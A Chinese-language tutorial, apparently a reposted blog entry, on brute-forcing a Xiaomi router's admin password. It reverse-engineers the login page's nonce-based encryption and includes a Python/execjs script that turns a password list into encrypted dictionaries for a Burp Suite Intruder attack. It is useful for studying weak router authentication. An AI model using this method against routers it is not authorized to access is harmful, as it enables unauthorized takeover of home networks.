小米路由器管理员密码爆破!
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一
目的
路由器管理员密码未知,根据已有字典爆破出管理员密码。
工具:burpsuite
脚本语言:python3.7+
1. 抓包分析
输入小米路由器管理员界面地址192.168.31.1
管理员密码未知
输入测试密码:123
使用burpsuite抓包2次 分别查看抓包结果
第一次抓包结果:
第二次抓包结果:
可以发现即使2次输入相同的密码123,向服务器发送的password和nonce字段也是不一样的。
由此可以判断所输入的密码经过了加密,且存在随机数。不能直接通过字典来爆破,需要将字典加密,并附带一个随机数nonce。
2. 源码读取
读取前端源码
f12选取页面中的元素,查看按钮id:btnRtSubmit
在调试器的web文件中查找按钮btnRtSubmit调用的方法
发现方法为loginHandle
查看loginHandle源码
发现密码经过了Encrypt方法加密
查看Encrpty.oldPwd方法源代码
发现oldPwd方法调用了目录中aes.js和sha1.js两个源文件
3. 编写脚本代码
所以计划通过python脚本调用js,将字典中数据加密,返回值为password和nonce。
JS代码(Encrypt.js)做了如下修改:
1.修改function loginHandle()
传入值为前端文本框输入的值,输出值为经过oldPwd函数输出的值(抓包中的password值)和Encrypt方法初始化时生成的nonce(抓包中的nonce值)
2.将oldPwd所用到的Encrypt方法和CryptoJS方法写在同一个js文件中,代码截图如下
Python脚本如下
import urllib
import execjs # 导入PyExecJS 库
def get_js(): # 导入js文件
f = open(“Encrypt.js”, ‘r’, encoding=‘UTF-8’)
line = f.readline()
htmlstr = ‘’
while line:
htmlstr = htmlstr + line
line = f.readline()
return htmlstr
jsstr = get_js()
ctx = execjs.compile(jsstr)
def creative_book(): # 创建密文密码字典
f = open(“top100PWD.txt”)
for line in f:
r = line.strip(’\n’)
utf = ctx.call(‘loginHandle’, r)
h = open(‘adobe_top100_pass_creative.txt’, ‘a’)
h1 = open(‘adobe_top100_pass_creative_random.txt’, ‘a’)
h.write("\n" + utf[0])
h1.write("\n" + urllib.parse.quote(utf[1]))
print(utf[0], urllib.parse.quote(utf[1]))
h.close()
h1.close()
f.close()
creative_book()
生成2个字典adobe_top100_pass_creative.txt和adobe_top100_pass_creative_random.txt
分别存放password和nonce。
截图如下
4. 爆破
以上步骤完成后,生成所需字典完毕,开始使用burpsuite攻击
将所抓的包发送至Intruder
选择Pitchfork,需要爆破的字段为password和nonce。
在Payloads中加载2个字典
点击Start attack开始攻击
攻击完成后点击length长度排序,发现异常长度
查看该请求包的回应包
code字段为0,分发了token,表明密码正确。
释放修改password和nonce字段为Payload1和Payload2,释放数据包。
成功取得管理员权限!
源代码
https://github.com/h2so0o4/Admin_Intruder
本文来源:http://33h.co/w8f8i
参考资料
https://blog.csdn.net/x1t02m/article/details/81949572
https://t0data.gitbooks.io/burpsuite/content/chapter8.html
小米路由器管理员密码爆破!相关推荐
- 小米云服务器怎么管理员密码,小米路由器管理密码怎么设置 小米路由器管理密码设置介绍【图文】...
路由器产品已经成为我们的实际生活中必不可缺的重要工具之一了,而且针对旗下林林总总的产品,包括品牌以及具体的型号板块都为消费者提供了多种多样的选择,那么对于我们自己而言,就比较倾向于选择知名的大品牌旗下 ...
- linux连接小米随身wifi密码忘记了,小米wifi管理员密码忘记了怎么办?
问:小米wifi路由器管理员密码忘了怎么办? 答:在< 既然你又问到了这个问题,那么下面再次对这个问题进行详细的解答,希望可以帮到你. 解决办法: 1.在登录页面中,输入你的小米路由器的wifi ...
- 深信服微型计算机管理员密码,AC1200路由器管理员密码是多少?
问:我家里有一个AC1200的路由器,请问此路由器的管理员密码是多少? 答:无法直接告诉你你的AC1200路由器管理员密码是多少,因为你没有说明你的路由器品牌和型号.不同厂家生产的AC1200路由器, ...
- sps忘记保存文档怎么恢复_路由器管理员密码忘了怎么办【解决方法】
路由器管理员密码忘记了怎么办?最近有朋友问小编这样的问题,小编总结了一些解决的方法,今天和大家分享一下,欢迎收藏. 方式一:尝试用默认密码登录 比较旧款的路由器的默认用户名和管理员密码一般为admin ...
- 小米无线路由器服务器用户名和密码忘了,小米路由器无线密码(wifi密码)忘记了怎么办? | 192路由网...
问:小米路由器无线密码忘记了怎么办?小米路由器WiFi密码忘记了怎么办?家里使用的是小米的无线路由器,由于手机.笔记本电脑自动保存了WiFi密码:时间长了,自己忘记了之前设置的WiFi密码是多少了,请 ...
- linux连接小米随身wifi密码忘记了,小米路由器无线密码(wifi密码)忘记了怎么办?...
问:小米路由器无线密码忘记了怎么办?小米路由器WiFi密码忘记了怎么办?家里使用的是小米的无线路由器,由于手机.笔记本电脑自动保存了WiFi密码:时间长了,自己忘记了之前设置的WiFi密码是多少了,请 ...
- 小米路由修改服务器密码,小米路由器3G密码怎么重置? 小米3G路由器修改wifi密码的方法...
小米路由器3G设置的wifi密码想要修改一下,该怎么修改呢?下面我们就来看看详细的教程. 输入管理密码,登录到小米路由器3G的设置界面 第一步.登录到设置界面 1.首先,请确保你的电脑,已经用网线,连 ...
- php怎么黑admin管理员密码是什么,千兆路由器管理员密码是什么?
问:我家里有一个千兆路由器,需要输入管理员密码才能登录到设置界面,请问管理员密码是什么? 答:对于路由器的管理员密码,只需要把下面的几个问题搞清楚,就不会有任何的疑问了. 1.有一些路由器有默认的管理 ...
- 修改路由器管理员密码
用网线将路由器和电脑连接好,在电脑上打开浏览器,在url地址栏中输入192.168.1.1. 2.在弹出的路由器登录界面输入用户名和密码(若该路由器没有改过密码,则原始用户名和密码均为admin). ...
- 小米无线路由器服务器用户名和密码忘了,小米路由器用户名和密码是什么
大家好,我是时间财富网智能客服时间君,上述问题将由我为大家进行解答. 小米路由器管理员一般是没有初始密码的,如果需要在登录路由器的时候提示输入密码,可以看看路由器底部有无密码,如果有密码的话就会在路由 ...
最新文章
- JSP简单练习-一个简单的计数器
- android view超出屏幕_Android APP界面保持屏幕常亮方法
- Python 考试练习
- http://dev2dev.bea.com.cn/bbs/thread.jspa?forumID=122threadID=9172tstart=0
- Cocos2dx 下面,对 音乐 和音效简单封装
- 在没有 IIS 的条件下运行 ASMX(WebService)
- 第一次自己成功写成的js程序
- Protel 99SE汉化教程
- svn update中断,报cleanup错误
- Mac上的全局翻译利器 : Bob + PopClip
- ffplay视频播放原理分析
- mysql 1.4安装步骤_1.4.1 MySql安装配置
- Max函数、Min函数
- 『运维自媒体联盟』限时特供学习资源大礼包
- 关闭Xshell系统提示音 Tab键 Backspace键
- 关于cookie的详细讲解
- Android系统应用开发
- 全国城市数据获取 mysql全国城市数据
- 【Linux】ps -ef 和ps aux 有什么不同呢?
- cannot resolve xxx 解决方法